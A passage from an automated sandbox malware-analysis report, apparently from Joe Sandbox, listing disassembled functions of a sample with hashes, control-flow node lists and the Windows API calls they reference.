                                                                                                            • Opcode ID: 131b6b873e5f6711a938c3c13097a3897aee555d2832088ab2f9ac010aa9e9d5
                                                                                                            • Instruction ID: 7532618b906307c69fbe602534823c3b2a9c438a18f65c298935d781e83d49e1
                                                                                                            • Opcode Fuzzy Hash: 131b6b873e5f6711a938c3c13097a3897aee555d2832088ab2f9ac010aa9e9d5
                                                                                                            • Instruction Fuzzy Hash: A2A183B4E012288FEB24CF6AC944B9DBBF2BF89301F54C1AAD508B7255DB345A85CF51
                                                                                                            Function 384E96C8 Relevance: .2, Instructions: 218COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2653950437.00000000384E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 384E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_384e0000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 29c3370f68e3b14c8797e5265addde0629c43ec49f178f96f04ec66705c0206d
                                                                                                            • Instruction ID: ee5a348bd280b76e6f45f4729e41e9cfb5854898064c4e06f508a9a326d50706
                                                                                                            • Opcode Fuzzy Hash: 29c3370f68e3b14c8797e5265addde0629c43ec49f178f96f04ec66705c0206d
                                                                                                            • Instruction Fuzzy Hash: BCA173B5E01218CFEB68CF6AC944B9DBBF2BF89301F14C1AAD448A7255DB345A85CF11
                                                                                                            Function 378A0F6F Relevance: .2, Instructions: 202COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2652426334.00000000378A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 378A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_378a0000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 51739a36d808284afeee38d9183182e729ad38fe158191b3979caa5f5491279f
                                                                                                            • Instruction ID: ac6b9fe3d1d0846a83907203dc3f568fda95e9b3a9408d2be358dc0ea9ae7d33
                                                                                                            • Opcode Fuzzy Hash: 51739a36d808284afeee38d9183182e729ad38fe158191b3979caa5f5491279f
                                                                                                            • Instruction Fuzzy Hash: 4D91EF74D00208CFEB50DFA8D988B9CBBB1FF49311F208269E419BB291EB759985CF55
                                                                                                            Function 00154328 Relevance: .2, Instructions: 194COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2623869181.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_150000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 8809ea466948902fe450e429b6803cbfe3afb862dc82707cddf08c2244e68f3a
                                                                                                            • Instruction ID: 2249f24ffd8419b40380c393af59bbd150535f77d2ca5d6794d82316a84cb5ce
                                                                                                            • Opcode Fuzzy Hash: 8809ea466948902fe450e429b6803cbfe3afb862dc82707cddf08c2244e68f3a
                                                                                                            • Instruction Fuzzy Hash: 3291D874D00218CFDB14CFAAD984A9DBBF2BF89305F148169D819AB365DB345D45CF50
                                                                                                            Function 384EBA97 Relevance: .2, Instructions: 189COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2653950437.00000000384E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 384E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_384e0000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: d93090e409951ba0e5bb73dc4684187d704d1c704ee6d99f7e22def54f524abc
                                                                                                            • Instruction ID: 20d4f44c43374daa70d597182cd5ee800cff77f7a560cff23f972c1738017ae9
                                                                                                            • Opcode Fuzzy Hash: d93090e409951ba0e5bb73dc4684187d704d1c704ee6d99f7e22def54f524abc
                                                                                                            • Instruction Fuzzy Hash: BB81E574E01248CFEB18DFA9D98069DBBF2BF88301F248529D454BB758DB35A942CF54
                                                                                                            Function 384E8640 Relevance: .2, Instructions: 183COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2653950437.00000000384E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 384E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_384e0000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: ba0f6b4102a4e49eeec295e59edd221e90d33b782c7712d3a70b7d12e44a2a6c
                                                                                                            • Instruction ID: 591d0eeb399891c455552b96e1ba9aa7e45f848af0795a38ae68ad19a103e70f
                                                                                                            • Opcode Fuzzy Hash: ba0f6b4102a4e49eeec295e59edd221e90d33b782c7712d3a70b7d12e44a2a6c
                                                                                                            • Instruction Fuzzy Hash: C081D575D05268CFDB64CF6AC9847DDBBB2BF89301F1480EAE418AB250DB356A85CF40
                                                                                                            Function 384E96C3 Relevance: .2, Instructions: 157COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2653950437.00000000384E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 384E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_384e0000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 909f6fa4ed6f030850a40fcd149ef7073695c1b7d4fb55d38b0a699515199147
                                                                                                            • Instruction ID: 87916066c73d5264ba863bbd3b32a29dbf6202bf0e46860523677e94f5594239
                                                                                                            • Opcode Fuzzy Hash: 909f6fa4ed6f030850a40fcd149ef7073695c1b7d4fb55d38b0a699515199147
                                                                                                            • Instruction Fuzzy Hash: 3D7192B4E01628CFEB68CF66C944B9DBBF2AF89300F14C0AAD40CA7255DB345A85CF11
                                                                                                            Function 384EA9AF Relevance: .2, Instructions: 156COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2653950437.00000000384E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 384E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_384e0000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 2f917a04752c27f69006ac1efb80afa9cfc1bc3b68e1f02c2e5967cf418f9028
                                                                                                            • Instruction ID: 2be4ffa176c3d48278d856c9ae65b7b29d4806848696af2a856d7e1d789d25b2
                                                                                                            • Opcode Fuzzy Hash: 2f917a04752c27f69006ac1efb80afa9cfc1bc3b68e1f02c2e5967cf418f9028
                                                                                                            • Instruction Fuzzy Hash: 747175B4D016288FEB68CF66C944B9DBBF2AF89301F14C1AAD50CB7255DB345A85CF11
                                                                                                            Function 384EC92F Relevance: .2, Instructions: 153COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2653950437.00000000384E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 384E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_384e0000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 3e4fb5fba42832edcdd3fc4ec7f211f1b223456375055c7a5e726564ac6be881
                                                                                                            • Instruction ID: 6a94c884d3c62c73cd2c458a8a017d5198270d9ffb424261b011d85214efb286
                                                                                                            • Opcode Fuzzy Hash: 3e4fb5fba42832edcdd3fc4ec7f211f1b223456375055c7a5e726564ac6be881
                                                                                                            • Instruction Fuzzy Hash: E3611634A00359DFEB25DFA1C894BADB772FB88300F5084AA991AB7755CB365D92DF00
                                                                                                            Function 384E67B0 Relevance: .1, Instructions: 102COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2653950437.00000000384E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 384E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_384e0000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 95c163bb7951df07443b0db1e4eadbc1d4c284983e7f1eb3a820f7dc16f605bb
                                                                                                            • Instruction ID: f2732d29e1b49980cdb709c23816a653380876f77fa74e45a15f6d6b8dd0d84e
                                                                                                            • Opcode Fuzzy Hash: 95c163bb7951df07443b0db1e4eadbc1d4c284983e7f1eb3a820f7dc16f605bb
                                                                                                            • Instruction Fuzzy Hash: 4941D2B5E01248CFEB18DFAAC99069DBBB2AF89300F24D169D418BB255EB385945CF50
                                                                                                            Function 384E9D0B Relevance: .1, Instructions: 101COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2653950437.00000000384E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 384E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_384e0000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 1850394885a56cc6b649f877c143cddb22bf58e14645900e5c2c5d8c15a46612
                                                                                                            • Instruction ID: fe3f18ef9b83ef3321db1fa75e17df5a6447ec54a87054e690ecca9dacb2d5c4
                                                                                                            • Opcode Fuzzy Hash: 1850394885a56cc6b649f877c143cddb22bf58e14645900e5c2c5d8c15a46612
                                                                                                            • Instruction Fuzzy Hash: CB4158B1E016188BEB58CF6BC9457D9FAF3AFC9301F14C1AAC50CA6264DB740A858F51
                                                                                                            Function 384EA35F Relevance: .1, Instructions: 100COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2653950437.00000000384E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 384E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_384e0000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 3146570e80c8d1ebdc0c0c49b721b4b048391966ec73e3e3f7d5252990ed3776
                                                                                                            • Instruction ID: e157458906556d77cb2285d59cec017902606527d1a64acf3b804fd511f2b8a4
                                                                                                            • Opcode Fuzzy Hash: 3146570e80c8d1ebdc0c0c49b721b4b048391966ec73e3e3f7d5252990ed3776
                                                                                                            • Instruction Fuzzy Hash: 5F4138B5E016188BEB58CF6BCD457C9FAF3AFC9300F14C1AAD50CA6264DB740A858F51
                                                                                                            Function 38A10970 Relevance: 6.1, APIs: 4, Instructions: 137threadCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • GetCurrentProcess.KERNEL32 ref: 38A109FE
                                                                                                            • GetCurrentThread.KERNEL32 ref: 38A10A3B
                                                                                                            • GetCurrentProcess.KERNEL32 ref: 38A10A78
                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 38A10AD1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2654135806.0000000038A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 38A10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_38a10000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Current$ProcessThread
                                                                                                            • String ID:
                                                                                                            • API String ID: 2063062207-0
                                                                                                            • Opcode ID: b4a22f5fa1be65403092ace52d8d0e642df548a2e8f0887ee8e63faa4e9c128b
                                                                                                            • Instruction ID: 133cecf25f7834cf2b3e2f3a1c306176936498409b7c39d6fe6753f25874db79
                                                                                                            • Opcode Fuzzy Hash: b4a22f5fa1be65403092ace52d8d0e642df548a2e8f0887ee8e63faa4e9c128b
                                                                                                            • Instruction Fuzzy Hash: F95156B0900749CFDB40CFAAC548BEEBFF1AF49300F24846AE458A7361DB749945CB65
                                                                                                            Function 38A10980 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • GetCurrentProcess.KERNEL32 ref: 38A109FE
                                                                                                            • GetCurrentThread.KERNEL32 ref: 38A10A3B
                                                                                                            • GetCurrentProcess.KERNEL32 ref: 38A10A78
                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 38A10AD1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2654135806.0000000038A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 38A10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_38a10000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Current$ProcessThread
                                                                                                            • String ID:
                                                                                                            • API String ID: 2063062207-0
                                                                                                            • Opcode ID: 73ac4bad39430993ee03187e0a5394bdf557af352b1e213fdbfc7298778176fc
                                                                                                            • Instruction ID: 042e5a6a3c1af2b1895b103210d6f3324a69a1dbc4c3a6b63942ba0bd2ee1df8
                                                                                                            • Opcode Fuzzy Hash: 73ac4bad39430993ee03187e0a5394bdf557af352b1e213fdbfc7298778176fc
                                                                                                            • Instruction Fuzzy Hash: 2F5134B0900609DFDB54CFAAC548BEEBBF1AF88300F208429E459A7351DB74A945CF65
                                                                                                            Function 38A12018 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 45timeCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 484 38a12018-38a1208a SetTimer 485 38a12093-38a120a7 484->485 486 38a1208c-38a12092 484->486 486->485
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2654135806.0000000038A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 38A10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_38a10000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Timer
                                                                                                            • String ID: W
                                                                                                            • API String ID: 2870079774-655174618
                                                                                                            • Opcode ID: 01e65f1e639386acc0af5e3ce237f57d4392ff12bcb0df496cd41b4f984938f8
                                                                                                            • Instruction ID: 1a3158dc6a679faef94fafbad4c05dd972505706246a4e8073d9825e4e49f483
                                                                                                            • Opcode Fuzzy Hash: 01e65f1e639386acc0af5e3ce237f57d4392ff12bcb0df496cd41b4f984938f8
                                                                                                            • Instruction Fuzzy Hash: C31133B5800348CFDB10CFAAD484BDEBFF4EB08320F14845AD898A7200C378A984CFA1
                                                                                                            Function 38A100B0 Relevance: 1.6, APIs: 1, Instructions: 149COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1375 38a100b0-38a100b8 1376 38a100ba-38a100be 1375->1376 1377 38a100fd-38a10176 1375->1377 1378 38a100c0-38a100ed 1376->1378 1379 38a100f5-38a100f6 1376->1379 1380 38a10181-38a10188 1377->1380 1381 38a10178-38a1017e 1377->1381 1393 38a100f0 call 38a100b0 1378->1393 1394 38a100f0 call 38a10110 1378->1394 1395 38a100f0 call 38a10104 1378->1395 1382 38a10193-38a10232 CreateWindowExW 1380->1382 1383 38a1018a-38a10190 1380->1383 1381->1380 1385 38a10234-38a1023a 1382->1385 1386 38a1023b-38a10273 1382->1386 1383->1382 1385->1386 1390 38a10280 1386->1390 1391 38a10275-38a10278 1386->1391 1392 38a10281 1390->1392 1391->1390 1392->1392 1393->1379 1394->1379 1395->1379
                                                                                                            APIs
                                                                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 38A10222
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2654135806.0000000038A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 38A10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_38a10000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 716092398-0
                                                                                                            • Opcode ID: b26b478461541c339e36b94699c36097d05a4aab285c4fa146b66f177d4891e4
                                                                                                            • Instruction ID: 129dea47a243adba05503c414417104cacc34eb07a79666f497365586b1d926e
                                                                                                            • Opcode Fuzzy Hash: b26b478461541c339e36b94699c36097d05a4aab285c4fa146b66f177d4891e4
                                                                                                            • Instruction Fuzzy Hash: 4851E2B5D04249EFDF02CFAAC884ACEBFB5BF49300F14816AE918AB221D7759855DF50
                                                                                                            Function 38A10104 Relevance: 1.6, APIs: 1, Instructions: 119COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1510 38a10104-38a10176 1512 38a10181-38a10188 1510->1512 1513 38a10178-38a1017e 1510->1513 1514 38a10193-38a10232 CreateWindowExW 1512->1514 1515 38a1018a-38a10190 1512->1515 1513->1512 1517 38a10234-38a1023a 1514->1517 1518 38a1023b-38a10273 1514->1518 1515->1514 1517->1518 1522 38a10280 1518->1522 1523 38a10275-38a10278 1518->1523 1524 38a10281 1522->1524 1523->1522 1524->1524
                                                                                                            APIs
                                                                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 38A10222
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2654135806.0000000038A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 38A10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_38a10000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 716092398-0
                                                                                                            • Opcode ID: 9d46dbafde62df21e6de391540a91a2e1aef210d357fbf2e869922ca09a992f3
                                                                                                            • Instruction ID: 1ca87bf1759b9a2a45cc63fd0a893c5fc17f75913f9223265acfae718d37ceb4
                                                                                                            • Opcode Fuzzy Hash: 9d46dbafde62df21e6de391540a91a2e1aef210d357fbf2e869922ca09a992f3
                                                                                                            • Instruction Fuzzy Hash: 0A51D0B5D00348DFDB15CFAAC884ADEBBB5FF48310F64812AE818AB210D774A945CF90
                                                                                                            Function 38A10110 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1525 38a10110-38a10176 1526 38a10181-38a10188 1525->1526 1527 38a10178-38a1017e 1525->1527 1528 38a10193-38a10232 CreateWindowExW 1526->1528 1529 38a1018a-38a10190 1526->1529 1527->1526 1531 38a10234-38a1023a 1528->1531 1532 38a1023b-38a10273 1528->1532 1529->1528 1531->1532 1536 38a10280 1532->1536 1537 38a10275-38a10278 1532->1537 1538 38a10281 1536->1538 1537->1536 1538->1538
                                                                                                            APIs
                                                                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 38A10222
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2654135806.0000000038A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 38A10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_38a10000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 716092398-0
                                                                                                            • Opcode ID: 4d9ffee349bde28443a1ebe12a564d5df3695f81449aabb5d2b8b391e83ecd57
                                                                                                            • Instruction ID: 13e0fa3bfcd894e0198dae032dd45d42bb1596cd641e053939d861dadd5fb104
                                                                                                            • Opcode Fuzzy Hash: 4d9ffee349bde28443a1ebe12a564d5df3695f81449aabb5d2b8b391e83ecd57
                                                                                                            • Instruction Fuzzy Hash: AC41AFB5D00349DFDB15CFAAD884ADEBBB5BF48310F64812AE818AB210D775A945CF90
                                                                                                            Function 38A11DC0 Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1539 38a11dc0-38a11dfc 1540 38a11e02-38a11e07 1539->1540 1541 38a11eac-38a11ecc 1539->1541 1542 38a11e09-38a11e40 1540->1542 1543 38a11e5a-38a11e92 CallWindowProcW 1540->1543 1548 38a11ecf-38a11edc 1541->1548 1551 38a11e42-38a11e48 1542->1551 1552 38a11e49-38a11e58 1542->1552 1544 38a11e94-38a11e9a 1543->1544 1545 38a11e9b-38a11eaa 1543->1545 1544->1545 1545->1548 1551->1552 1552->1548
                                                                                                            APIs
                                                                                                            • CallWindowProcW.USER32(?,?,?,?,?), ref: 38A11E81
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2654135806.0000000038A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 38A10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_38a10000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CallProcWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 2714655100-0
                                                                                                            • Opcode ID: 8a2d727f0a28561a3c3e967e408776a67a96bb8f36dba65ae91d2431fe21cd81
                                                                                                            • Instruction ID: d1f11ef2630ba841874eedac9397f5df14d73e25cea4f2b502c98caedc6399af
                                                                                                            • Opcode Fuzzy Hash: 8a2d727f0a28561a3c3e967e408776a67a96bb8f36dba65ae91d2431fe21cd81
                                                                                                            • Instruction Fuzzy Hash: F64129B8900349CFDB04CF99C444BAABBF5FF88310F24C459D958AB361D774A841CBA0
                                                                                                            Function 38A1D488 Relevance: 1.6, APIs: 1, Instructions: 76comCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1653 38a1d488-38a1d48d 1654 38a1d431-38a1d432 1653->1654 1655 38a1d48f-38a1d4fe 1653->1655 1656 38a1d434-38a1d436 1654->1656 1657 38a1d438-38a1d43b 1654->1657 1659 38a1d500-38a1d506 1655->1659 1660 38a1d507-38a1d51b 1655->1660 1656->1657 1661 38a1d441-38a1d452 OleInitialize 1657->1661 1659->1660 1662 38a1d454-38a1d45a 1661->1662 1663 38a1d45b-38a1d478 1661->1663 1662->1663
                                                                                                            APIs
                                                                                                            • OleInitialize.OLE32(00000000), ref: 38A1D445
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2654135806.0000000038A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 38A10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_38a10000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Initialize
                                                                                                            • String ID:
                                                                                                            • API String ID: 2538663250-0
                                                                                                            • Opcode ID: 4c6bb6c6f3739f64881e72d637385518faa0bbaabc4d25c91f0b8275da97852f
                                                                                                            • Instruction ID: 13ca7c9d030fc20bb662154b8e280e7e1929449eb8c749fb05d78f45e073f4c4
                                                                                                            • Opcode Fuzzy Hash: 4c6bb6c6f3739f64881e72d637385518faa0bbaabc4d25c91f0b8275da97852f
                                                                                                            • Instruction Fuzzy Hash: 8A3167B6C04248CFDB10CFAAD4447DEFBF0EF49220F24846AD899A7211C378A545CFA1
                                                                                                            Function 38A10BC0 Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1667 38a10bc0-38a10c5c DuplicateHandle 1669 38a10c65-38a10c82 1667->1669 1670 38a10c5e-38a10c64 1667->1670 1670->1669
                                                                                                            APIs
                                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 38A10C4F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2654135806.0000000038A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 38A10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_38a10000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DuplicateHandle
                                                                                                            • String ID:
                                                                                                            • API String ID: 3793708945-0
                                                                                                            • Opcode ID: 1a6c68335fb65e48c0e0d065e402c1775e450f36a24a601b502554f0228597d5
                                                                                                            • Instruction ID: 245c7dba5656560966e64f3ba1184742ab73f34e063d5cff2346b68d71f9744d
                                                                                                            • Opcode Fuzzy Hash: 1a6c68335fb65e48c0e0d065e402c1775e450f36a24a601b502554f0228597d5
                                                                                                            • Instruction Fuzzy Hash: 1E21E5B5900249DFDB10CFAAD584BDEBBF4EF48320F14846AE954A7310D374A954CFA5
                                                                                                            Function 38A10BC8 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1673 38a10bc8-38a10c5c DuplicateHandle 1674 38a10c65-38a10c82 1673->1674 1675 38a10c5e-38a10c64 1673->1675 1675->1674
                                                                                                            APIs
                                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 38A10C4F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2654135806.0000000038A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 38A10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_38a10000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DuplicateHandle
                                                                                                            • String ID:
                                                                                                            • API String ID: 3793708945-0
                                                                                                            • Opcode ID: ee640d5427fd63eda13a75df08e5179f3133cc05abfc4a7417e52c203b52b7df
                                                                                                            • Instruction ID: 951687d136830438c75651dcd135f0898158ca534029b935fb0bdc28457ada95
                                                                                                            • Opcode Fuzzy Hash: ee640d5427fd63eda13a75df08e5179f3133cc05abfc4a7417e52c203b52b7df
                                                                                                            • Instruction Fuzzy Hash: 4521D5B5900249DFDB10CFAAD584BDEFBF4EB48310F14842AE958A7350D374A954CF65
                                                                                                            Function 38A1D3E8 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • OleInitialize.OLE32(00000000), ref: 38A1D445
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2654135806.0000000038A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 38A10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_38a10000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Initialize
                                                                                                            • String ID:
                                                                                                            • API String ID: 2538663250-0
                                                                                                            • Opcode ID: 07f9501ffab70d702f74dda8e502d824a3cc1a5452bda3f6679127a63a06329d
                                                                                                            • Instruction ID: 664698e3243152765af9f8901dd8555a6c451a601bb2122e0e6479f08ce5855a
                                                                                                            • Opcode Fuzzy Hash: 07f9501ffab70d702f74dda8e502d824a3cc1a5452bda3f6679127a63a06329d
                                                                                                            • Instruction Fuzzy Hash: AF1133B5804288CFDB10CFAAD484BDEBFF0EF49320F24846AD459A7200C375A544CFA1
                                                                                                            Function 38A1C560 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1690 38a1c560-38a1d452 OleInitialize 1692 38a1d454-38a1d45a 1690->1692 1693 38a1d45b-38a1d478 1690->1693 1692->1693
                                                                                                            APIs
                                                                                                            • OleInitialize.OLE32(00000000), ref: 38A1D445
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2654135806.0000000038A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 38A10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_38a10000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Initialize
                                                                                                            • String ID:
                                                                                                            • API String ID: 2538663250-0
